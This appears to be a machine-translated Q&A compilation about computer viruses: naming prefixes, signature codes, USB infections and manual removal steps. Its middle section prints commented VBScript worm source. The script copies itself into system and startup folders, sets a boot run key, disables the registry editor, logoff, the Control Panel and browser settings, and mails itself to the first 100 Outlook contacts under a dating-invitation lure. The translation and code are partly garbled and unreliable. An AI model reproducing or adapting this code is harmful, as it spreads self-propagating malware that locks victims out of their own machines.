What is the meaning of small computer virus code?

Help computer virus code as follows what does it mean? (Detailed) Give extra points for satisfaction!

This is a typical virus that specializes in infecting USB drives. It infects files by appending its own code to the target host file. It spreads by planting copies of itself in all removable drives. It is characterized by creating the following folder in all physical and removable drives: recycle.{645FF040-5081-101B-9F08-00AA002F954E}, which manifests itself by implanting the AUTORUN.INF file, which automatically executes the implanted copy when the user accesses the drive on the infected system.

Handling method: download a U disk virus killer software or use 360 to get it done.

What is virus source code? What does it do? How does it work?

The so-called virus code can actually be imagined as the fingerprints of the culprits, when the anti-virus software companies collect a new virus, they will be from the virus program will be intercepted from a small section of the unique and sufficient to indicate that the virus of the binary code (BinaryCode), as the anti-virus program to identify the basis of this virus, and this unique binary code is the The so-called virus code. Virus code can disrupt a computer program so that the computer can’t be used normally.

About the code name of computer virus

1, system virus

System viruses are prefixed with Win32, PE, Win95, W32, W95 and so on. The general public characteristic of these viruses is that they can infect the *.exe and *.dll files of the windows operating system and spread through these files. Such as CIH virus.

2, worms

Worms are prefixed: Worm. the public characteristics of this virus is spread through the network or system vulnerabilities, most of the worms have to send out the poisonous mail, blocking the characteristics of the network. For example, Shockwave (blocking the network), small mailman (send poisoned mail) and so on.

3, Trojan, hacker viruses

The Trojan virus prefix is: Trojan, hacker virus prefix name is generally Hack. Trojan virus public characteristics is through the network or system vulnerability into the user’s system and hide, and then to the outside world to disclose the user’s information, and hacker viruses have a visual interface, can be on the user’s computer for remote control. Trojans and hacking viruses tend to come in pairs, i.e. the Trojan is responsible for breaking into the user’s computer, while the hacking virus will take control through that Trojan. Both types are now becoming more and more integrated. General Trojan such as QQ message tail Trojan Trojan.QQ3344, and you may meet more for online games Trojan virus such as Trojan.LMir.PSW.60. Here to add a little bit, the virus name in the PSW or what the PWD and so on generally indicate that the virus has the function of stealing passwords (these letters are generally for). “The virus has the function of stealing passwords (these letters are generally the abbreviation of “password” in English), and some hacker programs such as Hack.Nether.

4, script viruses

Script virus prefix is: Script. script virus is the public characteristics of the use of scripting language written through the web page for the dissemination of viruses, such as code red (Script.Redlof) – is not our boss code brother oh ^ _ ^. Script viruses will also have the following prefixes: VBS, JS (indicating what kind of script was written), such as Happytime (VBS.Happytime), Fourteen Days (Js.Fortnight.c.s), and so on.

5, macro viruses

In fact, macro viruses are also a kind of scripting viruses, because of its specificity, so here counted as a separate category. Macro virus prefix is: Macro, the second prefix is: Word, Word97, Excel, Excel97 (and perhaps others) one of them. Where only infected WORD97 and previous versions of WORD document virus using Word97 as the second prefix, the format is: Macro.Word97; where only infected WORD97 after the version of WORD document virus using Word as the second prefix, the format is: Macro. EXCEL document virus using Excel97 as the second prefix, the format is: Macro.Excel97; where only EXCEL97 after the version of EXCEL document virus using Excel as the second prefix, the format is: Macro. The public characteristics of this type of virus is able to infect the OFFICE series of documents, and then spread through the OFFICE generic template, such as: the famous Melissa (Macro.Melissa).

6, backdoor virus

Backdoor virus prefix is: Backdoor. the public characteristics of this type of virus is spread through the network, to the system to open the backdoor, to the user’s computer security risks.

7, virus planting program viruses

The public characteristic of this kind of virus is that when it runs, it will release one or several new viruses from the body to the system directory, and the new viruses released will cause damage. For example: Glacier Seeder (Dropper.BingHe2.2C), MSN Shooter (Dropper.Worm.Smibag) and so on.

8. Destructive program viruses

Destructive program viruses are prefixed with: Harm. the common characteristic of these viruses is that they have a good-looking icon to tempt the user to click on the user clicks on these viruses, when the user clicks on these viruses, the virus will be directly on the user’s computer to produce damage. For example, format C disk (Harm.formatC.f), Killer Command (Harm.Command.Killer) and so on.

9. Joke viruses

Joke viruses have the prefix: Joke. also known as prank viruses. The common characteristic of this kind of virus is that it has a good-looking icon to tempt the user to click, when the user clicks on this kind of virus, the virus will make a variety of destructive operations to scare the user, in fact, the virus does not have any damage to the user’s computer. For example, the Joke.Girlghost virus.

10. Binder Virus

The prefix of Binder Virus is: Binder. The common characteristic of this kind of virus is that the virus author will use a specific bundling program to bundle the virus with some applications such as QQ, IE, which is a normal file on the surface, when the user runs these bundled viruses, he or she will ostensibly run these applications, and then hide and run the bundled viruses. When users run these bundled viruses, they will run these applications superficially, and then run the bundled viruses in a hidden way, thus causing harm to the users. For example: Binder.QQPass.QQBin, Binder.killsys, and so on.

Computer virus source code introduction

Computer virus want to start from its source code how to do it! There I am, the following by me to give you a detailed introduction to the source code of computer viruses! I hope it will help you!

Computer virus source code introduction:

Computer virus source code a:

onerrorresumenext

setfs=createobject(“ing.filesystemobject”‘Create an object that can communicate with the operating system, and then use the object’s various methods to manipulate the registry

setdir1=fs.getspecialfolder(0) ‘Get the location of the windows/winnt folder

setdir2=fs.getspecialfolder(1) ‘Get the location of the system32/system folder.

setso=createobject(“ing.filesystemobject”

dimr’Define a variable

setr=createobject(“w.shell”

so.getfile(w.fullname). copy(dir1&”\win32system.vbs”‘Copy the virus copy to the windows/winnt folder location

so.getfile(w.fullname).copy(dir2&”\win32system.vbs”‘Copy the virus copy to the system32/system folder location

so.getfile(w.fullname).copy(dir1&”\startmenu\programs\startup\win32system.vbs” ‘Copy the virus copy to the startmenu startup menu

< p> ‘The following are malicious modifications to the registry and simply rely on oe to spread

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer\norun”,1, “reg_dword”‘ Modify the registry to disable the “Run” menu

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose”,1 , “reg_dword” ‘Modify the registry to disable the “Close” menu

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ explorer\nodrives”,63000000, “reg_dword” ‘Modify the registry to hide all logical disk drives

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ system\disableregistrytools”,1, “reg_dword” ‘Modify registry, disable registry editing

r.regwrite “hklm\software\microsoft\windows\currentversion\run\ scanregistry”,”” ‘Modify registry to disable boot registry scanning

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff”,1,” reg_dword” ‘Modify the registry to disable the “logoff” menu

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ winoldapp\norealmode”,1, “reg_dword” ‘Modify registry to disable ms-dos real mode

r.regwrite “hklm\software\microsoft\windows\currentversion\run\ win32system”, “win32system.vbs” ‘Modify the registry to make the script itself run automatically on boot

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ explorer\nodesktop”,1, “reg_dword” ‘Modify the registry to disable the display of desktop icons

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ winoldapp\disabled”,1, “reg_dword” ‘Modify the registry to disable pure dos mode

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer \nosettaskbar”,1, “reg_dword” ‘Modify the registry to disable the “Taskbar and Start” menus

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer currentversion\policies\explorer\noviewcontextmenu”,1, “reg_dword” ‘Modify the registry to disable the right-click menu

Computer Virus Source Code 2:

r.regwrite “hkcu\software\\microsoft\windows\twitter microsoft\windows\currentversion\policies\explorer\nosetfolders”,1, “reg_dword” ‘Modify the registry to disable the control panel

r.regwrite “hklm\software\classes \.reg\”, “txtfile” ‘Modify the registry to prohibit the importation of .reg files and replace them with txt file associations

r.regwrite “hklm\software\microsoft\windows\currentversion\winlogon\ legalnoticecaption”, “warning” ‘Set the title of the boot prompt box

r.regwrite “hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext”, “You’ve been hit by a vbs script virus, cry~”‘ set the text content of the boot prompt box

setol=createobject(“outlook.application”) ‘create outlook file object for propagation

onerrorresumenext

forx= 1to100

setmail=ol.createitem(0)

mail.to=ol.getnamespace(“mapi”.addresslists(1).addressentries(x) ‘used to send this vbs virus to the first 100 of the address book. Could be considered a simple retarded worm~~

mail.subject=”Are you coming tonight?”‘ Subject

mail.body=”Hello friend: Your friend rose has sent you a warm invitation. Please read the enclosed attachment for details and good luck! SameCityDating.com”‘ mail.body

mail.attachments.add(dir2& “win32system.vbs”

mail.send

next

ol.quit

‘The following is a description of the malicious changes to internetexplore options

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\nobrowsercontextmenu”,1,” reg_dword”‘Modify registry to disable right mouse button

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\nobrowseroptions”,1, “reg_ dword”‘Modify registry to disable internet options

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\nobrowsersaveas”,1, “reg_ dword”‘Modify the registry to disable “save as”

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\ nofileopen”. nofileopen”,1, “reg_dword” ‘Modify the registry to disable the “File/Open” menu

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\ internetexplorer\controlpanel\advanced”,1, “reg_dword” ‘Modify the registry to disable changing the advanced page settings

r.regwrite “hkcu\software\policies\microsoft\ internetexplorer\controlpanel\cacheinternet”,1, “reg_dword”‘Modify the registry to disable changing the temporary file settings

r.regwrite “hkcu\software\policies\microsoft\ internetexplorer\controlpanel\autoconfig”,1, “reg_dword”‘Modify the registry to disable changes to autoconfig

r.regwrite “hkcu\software\policies\microsoft\ internetexplorer\controlpanel\homepage”,1, “reg_dword”‘Modify the registry to disable changes to the homepage, i.e., the “homepage” is grayed out

r.regwrite “hkcu\software\policies\microsoft policies\microsoft\internetexplorer\controlpanel\history”,1, “reg_dword”‘Modify the registry to disable changing the history settings

r.regwrite “hkcu\software\policies\ microsoft\internetexplorer\controlpanel\history”,1, “reg_dword”‘Modify the registry to disable changing the history settings

r.regwrite “hkcu\software\policies\ microsoft\internetexplorer\controlpanel\history microsoft\internetexplorer\controlpanel\connwizadminlock”,1, “reg_dword”‘Modify the registry to disable changes to the Internet Connection Wizard

r.regwrite “hkcu\software\policies\microsoftsoftware\policies\microsoftware\policies/policies/history settings”. policies\microsoft\internetexplorer\controlpanel\securitytab”,1, “reg_dword”‘Modify the registry to disable changes to security entries

r.regwrite “hkcu\software\policies\ microsoft\internetexplorer\controlpanel\resetwebsettings”,1, “reg_dword”‘Modify the registry to disable “reset web settings”

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\noviewsource”,1, “reg_dword” ‘Modify the registry to disable viewing of the source file

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\noviewsource”,1, “reg_dword” ‘Modify the registry to disable viewing of the source file

r.regwrite “hkcu\ software\policies\microsoft\internetexplorer\infodelivery\restrictions\noaddingsubions”,1, “reg_dword” ‘Modify the registry to disable adding offline schedules

What is the signature code of a virus? What does it do?

The so-called signature code of a virus is a piece of code with a specific pattern found in the virus program through the scanning of antivirus software, and this code makes this virus distinguishable from other files. Through this characteristic code, it is possible to recognize whether this file has a virus. When the file is encountered, it is scanned, and if it contains this feature code, it can be assumed that the file is infected with a virus. This is the function of the signature code.

What is the virus source code?

Category:Computer/Network>> Antivirus

Question Description:

Is it possible for a virus to be completely eliminated

Answer:

It is true that knowing the source code of a virus isn’t necessary to kill it completely. In fact, even if we know the source code of the virus, it won’t help us much to kill the virus (to remove ambiguity: in some cases, knowing the source code of a file can be very helpful).

Here’s how to kill a virus in its entirety, if you think it’s good, give some points. Oh:

1 If you know that the machine has a virus. That is, antivirus software has found the virus, the operation method is as follows:

1) to get the name of the virus, you can generally find the antivirus software history. Such as a virus for “A.abc”

2) to Google or Baidu search “A.abc” to get the details of the virus. Generally speaking, the detailed information includes the storage location of the virus file and the registry information of the virus.

3) Press Ctrl+Alt+Del to open Windows Task Manager, click on the Processes tab to view the process information, if there is “A.abc”, then close this process, and then close the task manager; if not, then close the task manager.

4) Find the virus file according to the file storage location you just got from Google or Baidu, and delete the virus file manually. If it is successfully deleted, proceed to step 5), if it is not successfully deleted, proceed to step 5), and then return to step 4) to delete the virus file

5) Follow the file registry information you just got from Google or Baidu to find the registry information of the virus and delete it.

Open the registry:

Start->Run->Type “regedit”, enter.

Follow the results of the query in Baidu or Google to find the virus registry information:

HKLM->Sofare->Microsoft->winodws->currentVersion->Run

On the right side there should be:

LOADYT2 “%systemroot%\inf\A.abc” Click to remove.

2 If you are not sure whether the machine is infected with a virus or not, you can do the following:

1) Press Alt + Ctl + Del to open the Task Manager, click on the Processes tab to view the process information. When you see a process that seems like a virus, use the process name as a search condition in Baidu or Google.

2) If the search result shows that it is really a virus, then follow step 3) of the first scenario.

3) If the search result shows that it is not a virus, do not end the process. Otherwise, if you don’t know the operating system well, it could lead to unpleasant consequences.